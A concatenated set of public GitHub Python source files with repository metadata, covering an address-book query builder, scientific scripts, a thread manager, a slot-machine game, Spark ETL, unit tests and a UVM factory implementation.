%s\"\n li = list(data)\n li.append(dict['HausNr'])\n data = tuple(li)\n if dict['Ort'] is not None and vorgaenger is False:\n get += \" WHERE Ort = %s\"\n data = (dict['Ort'],)\n vorgaenger = True\n elif dict['Ort'] is not None and vorgaenger is not False:\n get += \" and Ort = %s\"\n li = list(data)\n li.append(dict['Ort'])\n data = tuple(li)\n if dict['PLZ'] is not None and vorgaenger is False:\n get += \" WHERE PLZ = %s\"\n data = (dict['PLZ'],)\n vorgaenger = True\n elif dict['PLZ'] is not None and vorgaenger is not False:\n get += \" and PLZ = %s\"\n li = list(data)\n li.append(dict['PLZ'])\n data = tuple(li)\n if dict['Land'] is not None and vorgaenger is False:\n get += \" WHERE Land = %s\"\n data = (dict['Land'],)\n vorgaenger = True\n elif dict['Land'] is not None and vorgaenger is not False:\n get += \" and Land = %s\"\n li = list(data)\n li.append(dict['Land'])\n data = tuple(li)\n\n if dict['birthdateDay'] is not None and vorgaenger is False:\n get += \" WHERE DAY(birthdate)= %s\"\n data = (dict['birthdateDay'],)\n vorgaenger = True\n elif dict['birthdateDay'] is not None and vorgaenger is not False:\n get += \" and DAY(birthdate) = %s\"\n li = list(data)\n li.append(dict['birthdateDay'])\n data = tuple(li)\n if dict['birthdateMonth'] is not None and vorgaenger is False:\n get += \" WHERE MONTH(birthdate)= %s\"\n data = (dict['birthdateMonth'],)\n vorgaenger = True\n elif dict['birthdateMonth'] is not None and vorgaenger is not False:\n get += \" and MONTH(birthdate) = %s\"\n li = list(data)\n li.append(dict['birthdateMonth'])\n data = tuple(li)\n if dict['birthdateYear'] is not None and vorgaenger is False:\n get += \" WHERE YEAR(birthdate)= %s\"\n data = (dict['birthdateYear'],)\n vorgaenger = True\n elif dict['birthdateYear'] is not None and vorgaenger is not False:\n get += \" and YEAR(birthdate) = %s\"\n li = list(data)\n li.append(dict['birthdateYear'])\n data = tuple(li)\n\n if dict['Nummer'] is not None and vorgaenger is False:\n get += \" WHERE Nummer = %s\"\n data = (dict['Nummer'],)\n elif dict['Nummer'] is not None and vorgaenger is not False:\n get += \" and Nummer = %s\"\n li = list(data)\n li.append(dict['Nummer'])\n data = tuple(li)\n\n return get, data\n\nMain()\n","repo_name":"Mai65/Adressbuch","sub_path":"venv/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":19553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25335475951","text":"'''\nWritten by: Orvin Demsy\nDate: 17 August 2019\n\nThis solution of mine is similar to the one provided online\nhttps://coderbyte.com/solution/Simple%20Adding#Python\n\nChallenge:\nHave the function SimpleAdding(num) add up all the numbers from 1 to num. For example: if the input is 4 then your program should return 10 because 1 + 2 + 3 + 4 = 10. 
For the test cases, the parameter num will be any number from 1 to 1000.\nSample Test Cases\n\nSample output:\nInput:12\nOutput:78\n\nInput:140\nOutput:9870\n'''\n\ndef simpleAdding(num):\n #declaring variable as total addition\n total = 0\n\n #generate num-iteration starting from 1\n for i in range(1, num+1):\n total = total + i\n\n return total\n\nnum = 4\n\nprint(simpleAdding(num))","repo_name":"orvindemsy/python-practice","sub_path":"19.08.16 beginner project/simpleAdding.py","file_name":"simpleAdding.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13792263628","text":"class FEMEMResult:\n def __init__(self, **kwargs):\n self.runtime = kwargs.get('runtime')\n self.total_potential = kwargs.get('fun')\n self.total_weight = kwargs.get('total_weight')\n self.best_solution = kwargs.get('u')\n\n self.total_iterations = kwargs.get('nit')\n self.total_evaluations = kwargs.get('nfev')\n\n self.restraints = kwargs.get('r')\n self.displacements = kwargs.get('u')\n self.elongation_rate = kwargs.get('n')\n self.stress = kwargs.get('s')\n # self.strain: list = []\n\n def __repr__(self):\n return \"\"\"\n FEMEM Results:\n \n Runtime : {runtime:.4f} seconds\n Total Potential : {total_potential}\n Total Weight : {total_weight}\n Best Solution : {best_solution}\n Total Iterations : {total_iterations}\n Total Evaluations : {total_evaluations}\n Restraints : {restraints}\n Displacements : {displacements}\n Elongation Rate : {elongation_rate}\n Stress : {stress}\n \"\"\".format(**self.__dict__)\n","repo_name":"batuhan0sanli/femem","sub_path":"femem_package/femem/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28114517810","text":"import numpy as np\nfrom scipy.signal import filtfilt\n\nimport pylops\nfrom pylops.utils.wavelets import ricker\n\n# plt.close(\"all\")\nnp.random.seed(0)\n\n# sphinx_gallery_thumbnail_number = 5\n\n# model\nnt0 = 301\ndt0 = 0.002\n\nt0 = np.arange(nt0) * dt0\nvp = 1200 + np.arange(nt0) + filtfilt(np.ones(5) / 5.0, 1, np.random.normal(0, 80, nt0))\nvs = 600 + vp / 2 + filtfilt(np.ones(5) / 5.0, 1, np.random.normal(0, 20, nt0))\nrho = 1000 + vp + filtfilt(np.ones(5) / 5.0, 1, np.random.normal(0, 30, nt0))\nvp[131:] += 500\nvs[131:] += 200\nrho[131:] += 100\nvsvp = 0.5\nm = np.stack((np.log(vp), np.log(vs), np.log(rho)), axis=1)\n\n# background model\nnsmooth = 50\nmback = filtfilt(np.ones(nsmooth) / float(nsmooth), 1, m, axis=0)\n\n# angles\nntheta = 21\nthetamin, thetamax = 0, 35\ntheta = np.linspace(thetamin, thetamax, ntheta)\n\n# wavelet\nntwav = 77\nwav = ricker(t0[: ntwav // 2 + 1], 35)[0]\n\n# lop\nPPop = pylops.avo.prestack.PrestackLinearModelling(\n wav, theta, vsvp=vsvp, nt0=nt0, linearization=\"akirich\"\n)\n\n# dense\nPPop_dense = pylops.avo.prestack.PrestackLinearModelling(\n wav, theta, vsvp=vsvp, nt0=nt0, linearization=\"akirich\", explicit=True\n)\n\n# data lop\ndPP = PPop * m.ravel()\ndPP = dPP.reshape(nt0, ntheta)\n\n# data dense\ndPP_dense = PPop_dense * m.T.ravel()\ndPP_dense = dPP_dense.reshape(ntheta, nt0).T\n\n# noisy data\ndPPn_dense = dPP_dense + np.random.normal(0, 1e-2, dPP_dense.shape)\n\n\nfile_path = \"D:/code_projects/matlab_projects/src/trans_gan_inversion/dPP_dense.mat\"\n\nimport scipy.io as scio\nscio.savemat(file_path, dict(dPP_dense=dPP_dense, vp=vp, vs=vs, 
rho=rho/1000))","repo_name":"stepbystep88/TransGanInversion","sub_path":"test/plot_avo.py","file_name":"plot_avo.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"2276919861","text":"\nimport threading\nimport logging\nfrom queue import Queue\nimport psutil\nfrom threading import Event\nfrom .task import Task\nfrom .managed_thread import ManagedThread\n\nlogging.basicConfig(level=logging.INFO)\n\nclass ThreadManager:\n def __init__(self):\n self.threads = []\n self.shutdown_event = Event()\n self.create_thread()\n\n def create_thread(self):\n task_queue = Queue()\n thread = ManagedThread(task_queue, self.shutdown_event)\n thread.start()\n self.threads.append({'thread': thread, 'queue': task_queue})\n\n def add_task(self, func, rate_ms):\n task = Task(func, rate_ms)\n min_load_thread = min(self.threads, key=lambda x: x['thread'].load)\n\n cpu_usage = max(psutil.cpu_percent(percpu=True))\n if min_load_thread['thread'].load + rate_ms >500 or cpu_usage > 70:\n self.create_thread()\n min_load_thread = self.threads[-1]\n\n min_load_thread['thread'].load += rate_ms\n min_load_thread['queue'].put(task)\n logging.info(f\"Task added to thread {min_load_thread['thread'].name} with load {min_load_thread['thread'].load}\")\n\n def shutdown(self):\n logging.info(\"Initiating graceful shutdown...\")\n self.shutdown_event.set()\n for t in self.threads:\n t['thread'].join()\n ","repo_name":"benjamincham/ThreadShare","sub_path":"ThreadShare/thread_manager.py","file_name":"thread_manager.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"13172716342","text":"import numpy as np\nfrom random import randint, uniform\nimport pickle\nimport os\nfrom threading import Lock\n\nchromsize=83\n\ndef CreateChromossome(size):\n return np.random.uniform(-1,1,[size])\n\ndef CreateInitialPopulation():\n #Creates a initial population of 100\n pop=[]\n \n #The list of population is composed of itens of the form [ChromName, Chromossome]\n for i in range(100):\n chromname='Gen1_chrom'+str(i)\n pop.append([chromname,CreateChromossome(chromsize)])\n \n return pop\n\ndef son(p1,p2):\n \n son=[]\n for i in range(len(p1)):\n j=randint(1,3)\n #The son's attributes are randomly selected\n if(j==1):\n son.append(p1[i])\n else:\n son.append(p2[i])\n return np.array(son)\n\ndef mutate(subj):\n \n mutated_subject=[]\n for f in subj:\n odds=randint(0,2)\n if(odds==0):\n gene=uniform(-1,1)\n mutated_subject.append(gene)\n else:\n mutated_subject.append(f)\n return np.array(mutated_subject)\n\ndef mutate_pop(pop):\n \n mutated_pop=[]\n for s in pop:\n odds=randint(0,2)\n if(odds==0):\n mutated_pop.append(mutate(s))\n else:\n mutated_pop.append(s)\n return np.array(mutated_pop)\n\ndef breed(population):\n \n sorted_pop=sorted(population,key=lambda x: x[2],reverse=True)\n most_adapted=sorted_pop[:10]\n print(\"most_adapted\")\n print([(x[0],x[2]) for x in most_adapted])\n print(\"----------------------------------\")\n next_pop=[]\n \n while(len(next_pop)<100):\n #selecting the parents\n p1=randint(0,9)\n p2=randint(0,9)\n next_pop.append(son(most_adapted[p1][1],most_adapted[p2][1]))\n \n return np.array(next_pop)\n\ndef name_pop(pop,gen):\n \n named_pop=[]\n i=0\n base_name=\"Gen\"+str(gen)+\"_chrom\"\n for s in pop:\n named_pop.append([(base_name+str(i)), s])\n i+=1\n return named_pop\n\nclass SubjectPool:\n \n def __init__(self):\n 
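# Resume from the newest pickled generation in Gen2/: files are saved as\n        # \"Gen_<n>_.gen\", so sorting on the integer between the underscores puts\n        # the latest generation first. The Lock serialises get_subj() and\n        # set_fitness() calls from concurrent workers.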
\n #List of the subjects of the form [ChromName, Chromossome]\n genn=os.listdir(\"Gen2/\")\n genn=sorted(genn,key=lambda x: int(x.split(\"_\")[1]),reverse=True)\n print(genn)\n print(genn[0])\n self.population=pickle.load( open(\"Gen2/\" +genn[0], \"rb\" ) )\n self.iterator=0\n self.lock=Lock()\n self.fit_count=0\n self.generation=int(genn[0].split(\"_\")[1])\n \n def set_fitness(self,fitness):\n \n #Sets the fitness of a given subject indexed by iterator\n self.lock.acquire()\n self.population[self.iterator].append(fitness)\n self.fit_count+=1\n self.lock.release()\n \n def get_subj(self):\n\n self.lock.acquire()\n \n if(self.iterator>=100 and self.fit_count>=100):\n self.generation+=1\n new_pop=breed(self.population)\n new_pop=mutate_pop(new_pop)\n new_pop=name_pop(new_pop,self.generation)\n pickle.dump( self.population, open(\"Gen2/Gen_\"+str(self.generation)+\"_.gen\", \"wb\" ) )\n self.population=new_pop\n self.iterator=0\n\n index=self.iterator%100\n self.iterator+=1\n self.lock.release()\n return self.population[index]","repo_name":"Ferch42/Snaike","sub_path":"PopulationTools.py","file_name":"PopulationTools.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22919070550","text":"from lxml import etree\nfrom typing import Tuple\n\nPACKAGE_TAG = 'package'\nAPPLICATION_TAG = 'application'\nAPPLICATION_NAME_ATTRIBUTE = '{http://schemas.android.com/apk/res/android}name'\n\n\ndef get_application_name_and_package(manifest_path: str, default_app_name: str = '') -> Tuple[str, str]:\n parsed_manifest = etree.parse(manifest_path)\n root = parsed_manifest.getroot()\n app_tag = root.find(APPLICATION_TAG)\n if app_tag is not None:\n app_name = app_tag.get(APPLICATION_NAME_ATTRIBUTE)\n if not app_name:\n app_name = default_app_name\n app_tag.set(APPLICATION_NAME_ATTRIBUTE, app_name)\n print('Patching {}'.format(manifest_path))\n parsed_manifest.write(manifest_path)\n else:\n app_name = default_app_name\n etree.SubElement(root, APPLICATION_TAG, attrib={APPLICATION_NAME_ATTRIBUTE: app_name})\n print('Patching {}'.format(manifest_path))\n parsed_manifest.write(manifest_path)\n package = root.get(PACKAGE_TAG, '')\n return app_name, package\n","repo_name":"guysaha1/appdome","sub_path":"fusion_engine/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32502851903","text":"from pymongo import MongoClient\n# pprint library is used to make the output look more pretty\nfrom pprint import pprint\n# connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string\nclient = MongoClient(\"mongodb+srv://user1:user1pw@msmongo1.x30yk.mongodb.net/mytestdb?retryWrites=true&w=majority\")\ndb=client['mytestdb']\n# print the contents of collection\ntestCollectionDocs=db[\"testCollection\"].find()\nfor doc in testCollectionDocs:\n pprint(doc)\n","repo_name":"smchitre/msmongo_hackathon","sub_path":"mongodb_atlas_test.py","file_name":"mongodb_atlas_test.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1048135838","text":"from fusionengine.files.imports import *\nimport fusionengine.files.draw as draw\nimport fusionengine.files.window as windowfe\nimport fusionengine.files.shape as shape\n\n\nclass _CustomButton:\n def __init__(\n self, window: 
windowfe._CustomRenderer, rect: shape._CustomShape, text: str\n    ) -> None:\n        \"\"\"A class that creates a new custom button. (Not for the user)\"\"\"\n\n        self.manager = window.manager\n        self.text = text\n        self.x = rect.x\n        self.y = rect.y\n        self.width = rect.width\n        self.height = rect.height\n\n        self.button = gui.elements.UIButton(\n            relative_rect=rect.rect, text=text, manager=self.manager\n        )\n\n    def button_pressed(self) -> bool:\n        \"\"\"Returns if the button is pressed.\"\"\"\n        return self.button.check_pressed()\n\n\nclass Button:\n    def new_button(\n        self, window: windowfe._CustomRenderer, rect: shape._CustomShape, text: str\n    ) -> _CustomButton:\n        \"\"\"Creates a new button for your ui.\"\"\"\n        return _CustomButton(window, rect, text)\n\n\nclass Text:\n    def print_text(\n        self,\n        window: windowfe._CustomRenderer,\n        text: str,\n        x: int,\n        y: int,\n        font_path: str,\n        font_size: int,\n        color: tuple,\n    ) -> None:\n        \"\"\"Prints text on the screen.\"\"\"\n\n        if os.path.exists(font_path):\n            font = pg.font.Font(font_path, font_size)\n        else:\n            font = pg.font.SysFont(font_path, font_size)\n\n        txtsurf = font.render(text, True, color)\n\n        window.window.blit(txtsurf, (x, y))\n\n\nclass UI:\n    def __init__(self) -> None:\n        \"\"\"A class that creates a new ui.\"\"\"\n        self.button = Button()\n        self.text = Text()\n","repo_name":"dimkauzh/fusion-engine","sub_path":"src/fusionengine/files/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"60"}
{"seq_id":"72279783871","text":"from Tkinter import *\n\nimport random\n\n#create the MySlotMachine class\nclass MySlotMachine:\n    #Background and buttons are placed on the screen\n    def __init__(self, parent):\n        self.myParent = parent\n        #create a frame and show it on the screen\n        self.myContainer1 = Frame(parent)\n        self.myContainer1.pack()\n\n        #Sets the background\n        self.BackgroundImage = PhotoImage(file=\"slot-machine.gif\")\n        self.BackgroundLabel = Label(self.myContainer1)\n        self.BackgroundLabel.configure(image=self.BackgroundImage, compound=CENTER)\n        self.BackgroundLabel.pack()\n\n        #Every control button follows the same pattern, so one helper builds them all\n        self.SpinButton = self.make_button(\"SpinButton.gif\", 315, 340, self.SpinButtonClick, height=50, width=60)\n        self.ResetButton = self.make_button(\"Reset.gif\", 40, 350, self.ResetButtonClick)\n        self.BetOneButton = self.make_button(\"BetOne.gif\", 155, 350, lambda event: self.set_bet(1))\n        self.BetFiveButton = self.make_button(\"BetFive.gif\", 67, 403, lambda event: self.set_bet(5))\n        self.BetTenButton = self.make_button(\"BetTen.gif\", 128, 403, lambda event: self.set_bet(10))\n        self.BetFiftyButton = self.make_button(\"BetFifty.gif\", 188, 403, lambda event: self.set_bet(50))\n        self.BetMaxButton = self.make_button(\"BetMax.gif\", 214, 350, lambda event: self.set_bet(100))\n\n        self.PlayerCredits = 500\n        self.PlayerBet = 0\n\n        #Sets and displays the credit and bet labels\n        self.CreditTextLabel = Label(self.myContainer1)\n        self.CreditTextLabel.configure(text=self.PlayerCredits, fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n        self.CreditTextLabel.pack()\n        self.CreditTextLabel.place(x=100, y=260)\n\n        self.BetTextLabel = Label(self.myContainer1)\n        self.BetTextLabel.configure(text=self.PlayerBet, fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n        self.BetTextLabel.pack()\n        self.BetTextLabel.place(x=170, y=260)\n\n        self.ReelLabels = [None, None, None]\n\n    def make_button(self, image_file, x, y, handler, height=35, width=35):\n        image = PhotoImage(file=image_file)\n        button = Button(self.myContainer1)\n        button.configure(image=image, height=height, width=width)\n        button.pack()\n        button.place(x=x, y=y)\n        button.bind(\"<Button-1>\", handler)\n        button.image = image  #keep a reference so the image is not garbage collected\n        return button\n\n    #When the spin button is clicked\n    def SpinButtonClick(self, event):\n        #Calls the random spin function\n        Fruit_Reel = self.SpinReels()\n\n        #Gets the values from the spin, assigns an image to each value and posts\n        #it to the screen; the three reels differ only in their x position\n        for reel, x in enumerate((60, 170, 270)):\n            image = PhotoImage(file=self.symbol_file(Fruit_Reel[reel]))\n            label = Label(self.myContainer1)\n            label.configure(image=image)\n            label.pack()\n            label.place(x=x, y=145)\n            label.image = image\n            self.ReelLabels[reel] = label\n\n    def symbol_file(self, value):\n        #Same weighted bands as SpinReels below\n        if value <= 26:\n            return \"Blank.gif\"\n        elif value <= 36:\n            return \"Strawberry.gif\"\n        elif value <= 45:\n            return \"Apple.gif\"\n        elif value <= 53:\n            return \"HorseShoe.gif\"\n        elif value <= 58:\n            return \"Clover.gif\"\n        elif value <= 61:\n            return \"Bell.gif\"\n        elif value <= 63:\n            return \"Diamond.gif\"\n        else:\n            return \"Seven.gif\"\n\n    #The random spin function\n    def SpinReels(self):\n        Bet_Line = [\" \", \" \", \" \"]\n        Outcome = [0, 0, 0]\n\n        # Spin those reels\n        for spin in range(3):\n            Outcome[spin] = random.randrange(1, 65, 1)\n            if Outcome[spin] <= 26:    # 40.10% Chance\n                Bet_Line[spin] = \"Blank\"\n            elif Outcome[spin] <= 36:  # 16.15% Chance\n                Bet_Line[spin] = \"Strawberry\"\n            elif Outcome[spin] <= 45:  # 13.54% Chance\n                Bet_Line[spin] = \"Apple\"\n            elif Outcome[spin] <= 53:  # 11.98% Chance\n                Bet_Line[spin] = \"HorseShoe\"\n            elif Outcome[spin] <= 58:  # 7.29% Chance\n                Bet_Line[spin] = \"Clover\"\n            elif Outcome[spin] <= 61:  # 5.73% Chance\n                Bet_Line[spin] = \"Bell\"\n            elif Outcome[spin] <= 63:  # 3.65% Chance\n                Bet_Line[spin] = \"Diamond\"\n            else:                      # 1.56% Chance\n                Bet_Line[spin] = \"Seven\"\n        return Outcome\n\n    #Button that closes the window\n    def ResetButtonClick(self, event):\n        self.myParent.destroy()\n\n    #Changes the bet value and updates the display in place instead of\n    #stacking a new Label over the old one on every click\n    def set_bet(self, amount):\n        self.PlayerBet = amount\n        self.BetTextLabel.configure(text=self.PlayerBet)\n\n\n#Main function\ndef main():\n    #create a top-level window\n    root = Tk()\n    #call the MySlotMachine class\n    myapp = MySlotMachine(root)\n    #execute the mainloop method of the \"root\" object\n    root.mainloop()\n\nif __name__ == \"__main__\": main()","repo_name":"GuidedBurrito/SlotMachine-Assignment2","sub_path":"SlotMachine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"25677522905","text":"# -*- coding: utf-8 -*-\nfrom pyspark.sql.functions import when, col, lower\n\nthunderstorm = ["thunderstorm with light rain\", \"thunderstorm with rain\",\n                \"thunderstorm with heavy rain\", \"light 
thunderstorm\", \"thunderstorm\",\n \"heavy thunderstorm\" ,\"ragged thunderstorm\", \"thunderstorm with light drizzle\",\n \"thunderstorm with drizzle\", \"thunderstorm with heavy drizzle\",\n \"proximity thunderstorm with rain\", \"proximity thunderstorm with drizzle\",\n \"proximity thunderstorm\"]\n\ndrizzle = [\"light intensity drizzle\", \"drizzle\", \"heavy intensity drizzle\",\n \"light intensity drizzle rain\", \"drizzle rain\", \"heavy intensity drizzle rain\",\n \"shower rain and drizzle\", \"heavy shower rain and drizzle\", \"shower drizzle\"]\n\nrain = [\"light rain\", \"moderate rain\", \"heavy intensity rain\", \"very heavy rain\", \"extreme rain\",\n \"freezing rain\", \"light intensity shower rain\", \"shower rain\", \"heavy intensity shower rain\",\n \"ragged shower rain\", \"proximity shower rain\"]\n\nsnow = [\"light snow\", \"snow\", \"heavy snow\", \"sleet\", \"light shower sleet\", \"shower sleet\",\n \"light rain and snow\", \"rain and snow\", \"light shower snow\", \"shower snow\",\n \"heavy shower snow\"]\n\natmosphere = [\"mist\", \"smoke\", \"haze\", \"sand/ dust whirls\", \"fog\", \"sand\", \"dust\",\n \"Ash volcanic ash\", \"squalls\", \"tornado\"]\n\nclear = [\"clear sky\"]\n\nclouds = [\"few clouds\", \"scattered clouds\", \"broken clouds\", \"overcast clouds\"]\n\n\nclass TemperatureDataframe():\n\n def __init__(self, spark):\n self.spark = spark\n\n def read(self, path):\n\n dataframe = self.spark.read.format(\"csv\") \\\n .option(\"header\", \"true\") \\\n .load(path) \\\n .select(\"datetime\", \"Chicago\")\n\n return dataframe\n\n def create_new_columns(self, dataframe):\n\n thunderstorm_broadcast = self.spark.sparkContext.broadcast(thunderstorm)\n drizzle_broadcast = self.spark.sparkContext.broadcast(drizzle)\n rain_broadcast = self.spark.sparkContext.broadcast(rain)\n snow_broadcast = self.spark.sparkContext.broadcast(snow)\n atmosphere_broadcast = self.spark.sparkContext.broadcast(atmosphere)\n clear_broadcast = self.spark.sparkContext.broadcast(clear)\n clouds_broadcast = self.spark.sparkContext.broadcast(clouds)\n\n dataframe = dataframe.withColumn(\"weather_condition\", when(col(\"weather_description\").isin(thunderstorm_broadcast.value), \"Thunderstorm\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(drizzle_broadcast.value), \"Drizzle\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(rain_broadcast.value), \"Rain\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(snow_broadcast.value), \"Snow\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(atmosphere_broadcast.value), \"Atmosphere\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(clear_broadcast.value), \"Clear\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(clouds_broadcast.value), \"Clouds\")\\\n .otherwise(\"Clouds\"))))))))\n\n return dataframe\n\n def create(self):\n\n humidity = self.read(\"hdfs:///user/labdata/csv/humidity.csv\")\\\n .withColumnRenamed(\"Chicago\", \"humidity\")\n pressure = self.read(\"hdfs:///user/labdata/csv/pressure.csv\") \\\n .withColumnRenamed(\"Chicago\", \"pressure\")\n temperature = self.read(\"hdfs:///user/labdata/csv/temperature.csv\") \\\n .withColumnRenamed(\"Chicago\", \"temperature\")\n wind_speed = self.read(\"hdfs:///user/labdata/csv/wind_speed.csv\")\\\n .withColumnRenamed(\"Chicago\", \"wind_speed\")\n weather_description_read = self.read(\"hdfs:///user/labdata/csv/weather_description.csv\")\\\n .withColumn(\"Chicago\",\n when(col(\"Chicago\") == \"sky is clear\", 
\"clear sky\")\n .otherwise(col(\"Chicago\")))\\\n .withColumnRenamed(\"Chicago\", \"weather_description\")\n weather_description = self.create_new_columns(weather_description_read)\n\n dataframe = humidity\\\n .join(pressure, humidity.datetime == pressure.datetime) \\\n .join(temperature, humidity.datetime == temperature.datetime) \\\n .join(weather_description, humidity.datetime == weather_description.datetime) \\\n .join(wind_speed, humidity.datetime == wind_speed.datetime) \\\n .select(humidity.datetime,\n humidity.humidity,\n pressure.pressure,\n temperature.temperature,\n weather_description.weather_condition.alias(\"weather_description\"),\n wind_speed.wind_speed)\n\n return dataframe\n","repo_name":"fabions83/ProjetoFinal-FIA","sub_path":"divvy_bikes/ingestion/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4563282576","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom parserator import data_prep_utils\nfrom lxml import etree\nimport unittest\n\nclass Mock(object):\n pass\n\nclass TestList2XML(unittest.TestCase):\n def setUp(self):\n mock_module = Mock()\n mock_module.GROUP_LABEL = 'Collection'\n mock_module.PARENT_LABEL = 'TokenSequence'\n self.training_data = data_prep_utils.TrainingData(None, mock_module)\n\n def test_xml(self):\n self.XMLequals( [('#', 'foo'), ('1', 'foo'), ('Pinto', 'foo')], '# 1 Pinto')\n self.XMLequals( [('&', 'foo'), ('1', 'foo'), ('Pinto', 'foo')], '& 1 Pinto')\n\n\n def test_none_tag(self):\n self.XMLequals( [('Box', 'foo'), ('#', 'Null'), ('1', 'foo'), ('Pinto', 'foo')], 'Box # 1 Pinto')\n self.XMLequals( [('#', 'Null'), ('1', 'foo'), ('Pinto', 'foo')], '# 1 Pinto')\n\n def test_ampersand(self):\n assert self.training_data._xml_to_sequence(self.training_data._sequence_to_xml([('&', 'foo')])) == (('&', 'foo'),)\n \n def XMLequals(self, labeled_sequence, xml):\n correct_xml = '' + xml + ''\n generated_xml = etree.tostring(self.training_data._sequence_to_xml(labeled_sequence)).decode()\n print('Correct: %s' %correct_xml)\n print('Generated: %s' %generated_xml)\n assert correct_xml == generated_xml\n\n\nif __name__ == '__main__' :\n unittest.main() \n","repo_name":"datamade/parserator","sub_path":"tests/test_xml.py","file_name":"test_xml.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":779,"dataset":"github-code","pt":"60"} +{"seq_id":"38909657273","text":"from buildbot.process.results import SKIPPED, SUCCESS\nfrom buildbot.test.fake.remotecommand import ExpectShell\nfrom buildbot.test.util import steps\nfrom buildbot.test.util.misc import TestReactorMixin\nfrom twisted.trial import unittest\n\nfrom eve.steps.redhat import UnregisterRedhat\nfrom eve.util.redhat import isRedhat\n\n\nclass TestUnregisterRedhat(steps.BuildStepMixin, TestReactorMixin,\n unittest.TestCase):\n\n def setUp(self):\n self.setUpTestReactor()\n return self.setUpBuildStep()\n\n def tearDown(self):\n return self.tearDownBuildStep()\n\n def test_success(self):\n self.setupStep(UnregisterRedhat())\n\n self.expectCommands(\n ExpectShell(workdir='wkdir',\n command='sudo subscription-manager unregister')\n + 0\n )\n self.expectOutcome(\n result=SUCCESS,\n state_string=\"Unregistered from Red Hat Customer Portal\"\n )\n return self.runStep()\n\n def test_skipped(self):\n command = \"rpm -qa | grep -qE '^redhat-release.+'\"\n 
self.setupStep(UnregisterRedhat(doStepIf=isRedhat))\n self.expectCommands(\n ExpectShell(workdir='/', command=command) + 1\n )\n self.expectOutcome(result=SKIPPED)\n return self.runStep()\n","repo_name":"scality/eve","sub_path":"tests/unit/steps/test_redhat.py","file_name":"test_redhat.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11282246144","text":"from typing import List, Optional\n\nfrom .sv import sv\nfrom .uvm_queue import UVMQueue\nfrom .uvm_pool import UVMPool\nfrom .uvm_globals import (uvm_report_error, uvm_report_fatal, uvm_report_warning,\n uvm_is_match, uvm_report_info)\nfrom .uvm_object_globals import UVM_NONE, UVM_MEDIUM, UVM_HIGH\nfrom ..macros import uvm_info\nfrom ..uvm_macros import UVM_STRING_QUEUE_STREAMING_PACK\n\n\n\ndef m_has_wildcard(nm: str) -> bool:\n \"\"\" Returns True if given string has wildcard * or ? \"\"\"\n for char in nm:\n if char == \"*\" or char == \"?\":\n return True\n return False\n\n\nclass uvm_factory_queue_class:\n def __init__(self):\n self.queue = UVMQueue()\n\n#\n# CLASS- UVMFactoryOverride\n#\n# Internal class. Data structure for factory overrides to store all override\n# related information.\n\nclass UVMFactoryOverride:\n\n\n def __init__(self, full_inst_path=\"\", orig_type_name=\"\", orig_type=None,\n ovrd_type=None):\n if ovrd_type is None:\n uvm_report_fatal(\"NULLWR\",\n \"Attempting to register a null override object with the factory\", UVM_NONE)\n self.full_inst_path = full_inst_path\n self.orig_type_name = orig_type_name\n if orig_type is not None:\n self.orig_type_name = orig_type.get_type_name()\n\n self.orig_type = orig_type\n self.ovrd_type_name = ovrd_type.get_type_name()\n self.ovrd_type = ovrd_type\n self.selected = False\n self.used = 0\n\n\n\nclass UVMFactory:\n \"\"\"\n UVMFactory is used to create objects of type `UVMComponent` and\n `UVMObject` (and their derived user-defined types).\n Object and component types are registered\n with the factory using lightweight proxies to the actual objects and\n components being created. The `UVMObjectRegistry` and\n `UVMComponentRegistry` class are used to proxy `UVMObject`\n and `UVMComponent`.\n\n The factory provides both name-based and type-based interfaces.\n\n type-based - The type-based interface is far less prone to errors in usage.\n\n name-based - The name-based interface is dominated\n by string arguments that can be misspelled and provided in the wrong order.\n Errors in name-based requests might only be caught at the time of the call,\n if at all.\n\n The `UVMFactory` is an abstract class. The UVM uses the `UVMDefaultFactory` class\n as its default factory implementation.\n\n See `UVMDefaultFactory` section for details on configuring and using the factory.\n \"\"\"\n\n #// Group: Retrieving the factory\n\n @classmethod\n def get(cls) -> 'UVMFactory':\n \"\"\"\n Function: get\n Static 